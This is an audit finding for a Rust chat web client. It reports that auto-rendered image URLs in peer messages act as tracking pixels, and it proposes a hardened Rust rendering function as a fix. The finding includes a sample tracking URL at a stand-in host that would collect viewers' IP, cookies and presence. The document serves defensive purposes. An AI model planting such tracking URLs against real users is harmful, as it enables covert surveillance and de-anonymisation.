Commit: 2f26d91 · Finding: SEC-W-04
Problem
Any http(s):// URL ending in an image extension in a peer's message body is auto-rendered as <img class="embed-image" src=url> (and wrapped in <a target=_blank>) at crates/web/src/components/message.rs:873-908. Scheme match at crates/web/src/components/message.rs:110-117.
No host allowlist, no referrerpolicy="no-referrer" on the img tag. A hostile peer broadcasting https://tracker.example/pixel.png?ch=<channel>&v=<victim-peer> into a public channel causes every viewer's browser to fetch it, leaking IP, User-Agent, accept-language, cookies, and approximate online time.
Fix
Either:
- (a — recommended, Signal/Discord approach) Disable auto-embed entirely; require explicit click-to-load through a same-origin proxy.
- (b) Add referrerpolicy="no-referrer" and crossorigin="anonymous" on the <img> tag, and gate auto-embed behind a user preference (off by default).
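Option (b) as an added example, not the project's message.rs code: a stand-alone Rust renderer that emits a plain link when the preference is off (the default) and the hardened <img> only when it is on. `render_image_embed`, `escape_attr`, `is_image_url` and `auto_embed_enabled` are assumed names, not the project's API.

```rust
// Example added to this finding, not the project's own component code.
// `render_image_embed` and `auto_embed_enabled` are assumed names.

const IMAGE_EXTENSIONS: [&str; 5] = ["png", "jpg", "jpeg", "gif", "webp"];

/// Escape a peer-supplied value so it cannot break out of a quoted attribute.
fn escape_attr(s: &str) -> String {
    s.chars()
        .map(|c| match c {
            '&' => "&amp;".to_string(),
            '<' => "&lt;".to_string(),
            '>' => "&gt;".to_string(),
            '"' => "&quot;".to_string(),
            '\'' => "&#39;".to_string(),
            _ => c.to_string(),
        })
        .collect()
}

/// True for http(s) URLs whose path (query and fragment ignored) ends in an
/// image extension; this mirrors the scheme/extension match the finding cites.
fn is_image_url(url: &str) -> bool {
    let lower = url.to_ascii_lowercase();
    if !(lower.starts_with("http://") || lower.starts_with("https://")) {
        return false;
    }
    let path = lower.split(|c: char| c == '?' || c == '#').next().unwrap_or("");
    IMAGE_EXTENSIONS.iter().any(|ext| path.ends_with(format!(".{ext}").as_str()))
}

/// With auto-embed off (the default) only a link is emitted, so nothing is
/// fetched until the viewer clicks. With it on, the <img> carries
/// referrerpolicy="no-referrer" and crossorigin="anonymous", so the request
/// sends neither the channel URL as referrer nor the viewer's cookies.
fn render_image_embed(url: &str, auto_embed_enabled: bool) -> Option<String> {
    if !is_image_url(url) {
        return None;
    }
    let href = escape_attr(url);
    let link_open = format!("<a href=\"{href}\" target=\"_blank\" rel=\"noopener noreferrer\">");
    if !auto_embed_enabled {
        return Some(format!("{link_open}{href}</a>"));
    }
    Some(format!(
        "{link_open}<img class=\"embed-image\" src=\"{href}\" \
         referrerpolicy=\"no-referrer\" crossorigin=\"anonymous\" loading=\"lazy\" alt=\"\"></a>"
    ))
}
```

Even with these attributes the image host still sees the viewer's IP and User-Agent on every auto-load, which is why option (a) is the recommended fix.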